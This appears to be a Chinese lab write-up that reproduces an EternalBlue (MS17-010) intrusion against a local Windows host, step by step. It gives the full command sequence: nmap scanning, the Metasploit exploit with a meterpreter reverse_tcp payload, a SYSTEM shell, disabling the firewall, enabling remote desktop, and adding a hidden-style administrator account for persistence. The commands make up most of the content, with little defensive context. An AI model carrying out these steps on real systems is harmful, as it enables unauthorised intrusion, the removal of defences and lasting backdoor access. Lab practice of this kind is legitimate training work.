永恒之蓝实验

我们通过永恒之蓝漏洞的利用来复现一下到提权和权限维持的windows渗透思路

信息搜集

首先扫描局域网内存活主机

1
nmap 192.168.0.*

Untitled

之后使用nmap扫描132主机

1
nmap 192.168.0.132

Untitled

发现目标开启了445端口,可以利用永恒之蓝,进入msfconsole

1
msfconsole

Untitled

漏洞利用

扫描msf17-010

1
search ms17-010

Untitled

我们使用第一个,然后查看配置

1
2
use 0
show options

Untitled

设置目标IP和payload

1
2
3
set rhost 192.168.0.132
set payload windows/x64/meterpreter/reverse_tcp
run

Untitled

提权

成功,进入shell并修改编码

1
2
3
getuid #获取system权限
shell
chcp 65001

关闭防火墙

1
2
**netsh advfirewall set currentprofile state off
netsh advfirewall set privateprofile state off**

Untitled

开启3389

1
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Untitled

查看端口 netstat -an ,开启成功

Untitled

创建用户,并给用户赋予管理员权限

1
2
net user admin$ Test123 /add
net localgroup Administrators admin$ /add

远程桌面连接,成功

Untitled

权限维持

可以结合之前的影子账户,完成后续的操作